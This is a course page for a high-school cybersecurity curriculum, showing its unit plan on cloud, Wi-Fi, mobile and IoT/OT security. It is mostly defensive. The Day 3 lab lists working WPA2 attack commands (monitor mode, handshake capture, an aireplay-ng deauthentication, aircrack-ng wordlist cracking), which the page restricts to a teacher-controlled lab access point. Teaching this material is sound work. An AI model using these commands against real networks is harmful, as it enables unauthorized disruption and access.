Blackbox Intelligence Group
Sign in
← All modules

Cybersecurity II · Module 11

Cybersecurity II, Unit 11: Cloud, Wireless, Mobile, and IoT Security

Beyond the data center perimeter: cloud shared responsibility done concretely (AWS / Azure / GCP), Wi-Fi attack categories, mobile threat models, and the IoT/OT realities that bite in 2025.

Length
300 min
Level
intermediate
Track
Cyber II
Cadence
Semester 2

Career paths

Cloud Security
Unlock this module →Request a review copyTry the free pack

Download 1-page brochure (PDF)·Share with admins, parents, or your CTE director.

What's in the lesson pack

Everything you need to teach this period.

Built by an OSCP-certified instructor who teaches this material every week. Print-ready, classroom-tested, copy-paste-able.

Teacher Guide

Locked

Lesson at a glance, learning objectives, vocabulary, pacing, mini-lessons, and discussion notes.

In-browser presenter

Locked

Full themed slide deck you can run live from your laptop. Speaker notes built in. Works offline once loaded.

PowerPoint (.pptx) export

Locked

Editable slide deck for districts that mandate PowerPoint or want to customize for their LMS.

Module overview

The full lesson plan, public.

Read everything before you commit. The plan, objectives, vocabulary, standards alignment, and pacing are open. Only the print-ready deliverables are gated.

Unit 11: Cloud, Wireless, Mobile, and IoT Security

Lesson at a glance

| Item | Detail | | --------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------- | | Suggested length | 5 × 60 minutes | | Recommended placement | Week 17 | | Prerequisite | Cyber I Unit 9; Cyber II Unit 2 | | Materials | AWS / Azure free-tier sandbox or simulated console (e.g., AWS Skill Builder labs), Wi-Fi adapter (lab only), Mobile Security Framework (MobSF), sample APK |

Safety: Cloud labs use personal sandbox accounts or teacher-provided lab accounts only. Wireless attacks are conducted only on the teacher-controlled lab AP, not on the school's network or any other Wi-Fi.

Standards & credential alignment

  • CSA Cloud Security Alliance core domains.
  • NIST SP 800-144 (cloud) and NIST SP 800-124 (mobile).
  • OWASP Mobile Top 10.
  • OffSec PEN-100 breadth coverage.

Learning objectives

By the end of this unit, students can:

  1. Apply the shared responsibility model concretely for IaaS, PaaS, SaaS with examples from AWS / Azure / GCP.
  2. Identify the top cloud misconfigurations (public S3, overprivileged IAM, exposed metadata, no MFA on root).
  3. Articulate Wi-Fi protocol generations and their weaknesses (WEP/WPA/WPA2/WPA3).
  4. Recognize mobile threat categories (insecure storage, unsafe IPC, broken crypto, M-in-M).
  5. Understand IoT/OT differences (uptime > confidentiality, legacy protocols, long lifecycles).
  6. Produce a one-page risk brief for a fictional company's hybrid environment.

Vocabulary

  • IaaS / PaaS / SaaS - Infrastructure / Platform / Software as a Service.
  • Shared responsibility - Provider secures of the cloud; customer secures in it.
  • IAM - Identity and Access Management.
  • IMDS - Instance Metadata Service.
  • WEP/WPA/WPA2/WPA3 - Wi-Fi protocol generations.
  • PMKID / handshake - Wi-Fi authentication artifacts attackers target.
  • MDM - Mobile Device Management.
  • OT / ICS / SCADA - Operational Technology / Industrial Control / Supervisory Control & Data Acquisition.

Pacing

| Day | Focus | Deliverable | | --- | --------------------------------- | ---------------------------------------- | | 1 | Cloud shared responsibility + IAM | Filled responsibility matrix | | 2 | Top cloud misconfigurations | 5 documented findings | | 3 | Wireless basics + lab | Captured handshake (lab only) + analysis | | 4 | Mobile + MobSF | MobSF report on sample APK | | 5 | IoT / OT realities + risk brief | 1-page risk brief |

Day 1 - Shared responsibility

Matrix template (filled in class for IaaS / PaaS / SaaS):

| | Physical | Network | OS | Runtime | Application | Data | Identity | | ---- | -------- | -------- | -------- | -------- | ----------- | -------- | -------- | | IaaS | Provider | Shared | Customer | Customer | Customer | Customer | Customer | | PaaS | Provider | Provider | Provider | Provider | Customer | Customer | Customer | | SaaS | Provider | Provider | Provider | Provider | Provider | Customer | Customer |

IAM concepts:

  • Principle of least privilege.
  • No long-lived access keys for humans.
  • MFA on root and privileged.
  • Roles > users for workloads.
  • Conditional access where supported.

Day 2 - Top cloud misconfigurations

Walk through (with sandbox demos where possible):

  1. Public S3 bucket / Azure Blob anonymous read enabled.
  2. Overprivileged IAM (AdministratorAccess for application service accounts).
  3. SSRF + IMDSv1 → cloud creds extraction (concept; do not exploit anything outside the lab).
  4. No MFA on root / break-glass account.
  5. Exposed RDP/SSH to 0.0.0.0/0 in security group.
  6. CloudTrail / Activity Log disabled.
  7. Long-lived access keys committed to GitHub.

Tooling to discuss: AWS IAM Access Analyzer, ScoutSuite, Prowler, Microsoft Defender for Cloud, Wiz / Orca (commercial CSPM).

Day 3 - Wireless

Concepts:

  • WEP - broken; never deploy.
  • WPA-TKIP - broken-ish; deprecated.
  • WPA2-PSK - vulnerable to offline cracking of weak PSKs after handshake capture.
  • WPA2-Enterprise (EAP) - much stronger.
  • WPA3-SAE - modern; not magic, but better.

Lab exercise (teacher-controlled AP only, with explicit pre-class authorization):

# Identify lab interface
iw dev

# Monitor mode (lab adapter only)
sudo airmon-ng start wlan0

# Watch
sudo airodump-ng wlan0mon

# Capture handshake from teacher AP
sudo airodump-ng -c <ch> --bssid <lab-ap-bssid> -w lab-cap wlan0mon
# Force a re-auth using the teacher's lab client
sudo aireplay-ng -0 1 -a <lab-ap-bssid> -c <lab-client> wlan0mon

# Crack against teacher-issued wordlist
aircrack-ng -w teacher-wordlist.txt -b <lab-ap-bssid> lab-cap-01.cap

Defensive lessons:

  • Strong PSK or move to enterprise.
  • 802.11w (Management Frame Protection).
  • Network segmentation for guest Wi-Fi.

Day 4 - Mobile + MobSF

Run MobSF on a sample APK provided by the teacher. Walk through report:

  • Permissions requested vs. needed.
  • Insecure storage findings (SharedPreferences plaintext).
  • Hardcoded secrets.
  • Network security config (cleartext allowed?).
  • TLS pinning presence.
  • WebView with setJavaScriptEnabled(true) + addJavascriptInterface.

Discuss OWASP Mobile Top 10. Discuss MDM controls (compliance policy, conditional access, app protection policies).

Day 5 - IoT / OT + risk brief

Realities:

  • Uptime > confidentiality in OT (you can't reboot a turbine).
  • Long lifecycles (15–25 years).
  • Legacy protocols (Modbus, DNP3, S7) without authentication.
  • Air-gap myths.
  • Patch windows measured in months, not minutes.

Categories:

  • Consumer IoT (cameras, doorbells) - usually weak by default.
  • Industrial IoT (sensors, PLCs) - segmented; specialized monitoring.
  • Building / HVAC - frequently overlooked; often the pivot point in real breaches (Target HVAC).

Risk brief assignment:

  • Fictional company "AcmeWidgets" has: AWS prod environment, Azure AD identity, employee laptops with MDM, contractor BYOD phones, factory floor with Modbus PLCs and a Windows 7 HMI.
  • Write 1 page: top 5 risks, top 5 mitigations.

Common misconceptions

  • "Cloud means the provider handles security." - They handle the of. You handle the in.
  • "WPA3 is unhackable." - Stronger, not invincible. Still vulnerable to weak passwords and side channels in some implementations.
  • "OT can't be patched, so don't bother." - Patching strategies in OT exist; they look different (windows, vendor coordination, compensating controls).

Assessment

  • Day 1 matrix.
  • Day 2 documented findings.
  • Day 3 capture + analysis paragraph.
  • Day 4 MobSF report.
  • Day 5 risk brief.

Career connection

Cloud security engineers $120K–$180K. OT/ICS security $130K–$200K (acute shortage). Mobile AppSec $100K–$160K.

Homework

Read CISA's "Securing OT" advisory. Pick one recommendation; write 2 paragraphs on why it matters and what blocks adoption.

Ready to use this in class?

Unlock the full Cybersecurity II edition.

All teacher guides, worksheets, scenarios, quizzes, answer keys, and the in-browser presenter for every module in the track. Site-license pricing for schools and districts. Free review copies for verified educators.

View pricingRequest review copySee full curriculum